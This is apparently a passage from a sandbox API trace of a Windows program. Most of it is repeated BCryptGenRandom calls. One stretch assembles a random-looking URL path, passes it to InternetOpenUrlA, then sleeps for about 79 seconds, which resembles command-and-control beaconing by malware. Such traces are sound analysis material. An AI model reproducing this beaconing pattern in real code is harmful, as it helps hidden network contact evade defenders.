(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.091] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.092] GetProcessHeap () returned 0x440000 [0198.092] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0198.092] lstrcpyA (in: lpString1=0x473770, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0198.092] lstrcatA (in: lpString1="P²¡\x03", lpString2="/ty2DquOX8h3a3jz2btE/8SWBp16kvlb82dgb7/" | out: lpString1="P²¡\x03/ty2DquOX8h3a3jz2btE/8SWBp16kvlb82dgb7/") returned="P²¡\x03/ty2DquOX8h3a3jz2btE/8SWBp16kvlb82dgb7/" [0198.092] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0198.092] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/ty2DquOX8h3a3jz2btE/8SWBp16kvlb82dgb7/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0198.093] GetProcessHeap () returned 0x440000 [0198.093] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0198.093] GetProcessHeap () returned 0x440000 [0198.093] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0198.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0198.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0198.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0198.094] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0198.094] Sleep (dwMilliseconds=0x1364e) [0198.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0198.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.424] GetProcessHeap () returned 0x440000 [0198.424] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a18060 [0198.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a18061, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a18061) returned 0x0 [0198.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1808e, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a1808e) returned 0x0 [0198.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0198.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a180ac, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a180ac) returned 0x0 [0198.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.443] BCryptGenRandom (in: 